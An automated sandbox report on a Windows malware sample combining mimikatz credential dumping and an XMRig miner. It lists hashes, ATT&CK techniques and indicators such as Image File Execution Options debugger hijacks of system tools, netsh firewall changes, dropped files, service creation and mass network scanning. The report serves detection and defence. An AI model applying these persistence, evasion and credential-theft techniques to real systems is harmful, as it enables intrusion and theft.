mimikatz | 45d5011031fd1253419a1e984cb7c4664e24a2c5b65524c794a121832d50d61b

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
Size

7.3MB
MD5

4502ca2613d9755aaa5f11c2715eb8fd
SHA1

cc6f79c98d2472c201095d6686f3702f965a06de
SHA256

45d5011031fd1253419a1e984cb7c4664e24a2c5b65524c794a121832d50d61b
SHA512

f88c3188e50ef1d1c819c7c603a24c7d733fd182b95e86eb01c6dc1b63cacd32353da431473fdfdc0311101eda2f1593807931990b2349c082ca015db25bfa9e
SSDEEP

196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1924 created 2136	1924	vyqvqhk.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30243) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/860-177-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-182-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-199-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-210-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-221-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-230-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-245-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-495-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-496-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-527-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-781-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig
behavioral2/memory/860-782-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 3 IoCs

resource	yara_rule
behavioral2/memory/116-3-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000b000000023b80-5.dat	mimikatz
behavioral2/memory/4620-134-0x00007FF64D0F0000-0x00007FF64D1DE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	vyqvqhk.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	vyqvqhk.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vyqvqhk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	vyqvqhk.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5028	netsh.exe
4032	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
1624	vyqvqhk.exe
1924	vyqvqhk.exe
2332	wpcap.exe
3188	synletgiy.exe
4620	vfshost.exe
2012	ybiefmuji.exe
4144	xohudmc.exe
2068	gyggue.exe
860	illibi.exe
1856	ybiefmuji.exe
1892	ybiefmuji.exe
4920	vyqvqhk.exe
5048	ybiefmuji.exe
3900	ybiefmuji.exe
3556	ybiefmuji.exe
2316	ybiefmuji.exe
3576	ybiefmuji.exe
1460	ybiefmuji.exe
1912	ybiefmuji.exe
3776	ybiefmuji.exe
4868	ybiefmuji.exe
3888	ybiefmuji.exe
4800	ybiefmuji.exe
1432	ybiefmuji.exe
1004	ybiefmuji.exe
4260	ybiefmuji.exe
1572	ybiefmuji.exe
3356	lbvnitihf.exe
2620	vyqvqhk.exe

Loads dropped DLL 12 IoCs

pid	Process
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
2332	wpcap.exe
3188	synletgiy.exe
3188	synletgiy.exe
3188	synletgiy.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	ifconfig.me
63	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	vyqvqhk.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\gyggue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	vyqvqhk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	vyqvqhk.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\gyggue.exe	xohudmc.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c6e-131.dat	upx
behavioral2/memory/4620-132-0x00007FF64D0F0000-0x00007FF64D1DE000-memory.dmp	upx
behavioral2/memory/4620-134-0x00007FF64D0F0000-0x00007FF64D1DE000-memory.dmp	upx
behavioral2/files/0x0007000000023c79-137.dat	upx
behavioral2/memory/2012-138-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/2012-142-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/files/0x0007000000023c76-159.dat	upx
behavioral2/memory/860-160-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/1856-168-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/1892-172-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-177-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/5048-180-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-182-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/3900-185-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/3556-189-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/2316-193-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/3576-197-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-199-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/1460-202-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/1912-206-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-210-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/3776-211-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/4868-215-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/3888-219-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-221-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/4800-224-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/1432-227-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/1004-229-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-230-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/4260-232-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/1572-234-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp	upx
behavioral2/memory/860-245-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/860-495-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/860-496-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/860-527-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/860-781-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx
behavioral2/memory/860-782-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\teuulnibr\UnattendGC\specials\exma-1.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\libxml2.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\schoedcl.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\vimpcsvc.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\svschost.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\lbvnitihf.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\spoolsrv.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\svschost.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\Packet.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\Corporate\mimidrv.sys	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\wpcap.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\docmicfg.exe	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\vimpcsvc.xml	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\docmicfg.xml	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\vyqvqhk.exe	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\crli-0.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\ssleay32.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\tucl-1.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\schoedcl.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\vimpcsvc.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\schoedcl.xml	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\vimpcsvc.xml	vyqvqhk.exe
File opened for modification	C:\Windows\teuulnibr\Corporate\log.txt	cmd.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\cnli-1.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\xdvl-0.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\spoolsrv.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\docmicfg.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\AppCapture64.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\wpcap.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\vimpcsvc.exe	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\spoolsrv.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\Corporate\mimilib.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\coli-0.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\posh-0.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\zlib1.dll	vyqvqhk.exe
File created	C:\Windows\ime\vyqvqhk.exe	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\vyqvqhk.exe	2025-01-19_4502ca2613d9755aaa5f11c2715eb8fd_hacktools_icedid_mimikatz.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\libeay32.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\docmicfg.xml	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\docmicfg.xml	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\schoedcl.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\synletgiy.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\ucl.dll	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\svschost.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\Shellcode.ini	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\scan.bat	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\schoedcl.xml	vyqvqhk.exe
File opened for modification	C:\Windows\teuulnibr\bftvueiwt\Packet.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\tibe-2.dll	vyqvqhk.exe
File created	C:\Windows\kbtjlvyu\svschost.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\AppCapture32.dll	vyqvqhk.exe
File opened for modification	C:\Windows\teuulnibr\bftvueiwt\Result.txt	lbvnitihf.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\trch-1.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\trfo-2.dll	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\specials\svschost.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\Corporate\vfshost.exe	vyqvqhk.exe
File created	C:\Windows\teuulnibr\bftvueiwt\ip.txt	vyqvqhk.exe
File created	C:\Windows\teuulnibr\UnattendGC\spoolsrv.xml	vyqvqhk.exe
File opened for modification	C:\Windows\kbtjlvyu\spoolsrv.xml	vyqvqhk.exe
File created	C:\Windows\teuulnibr\upbdrjv\swrpwe.exe	vyqvqhk.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3944	sc.exe
4952	sc.exe
1584	sc.exe
3108	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
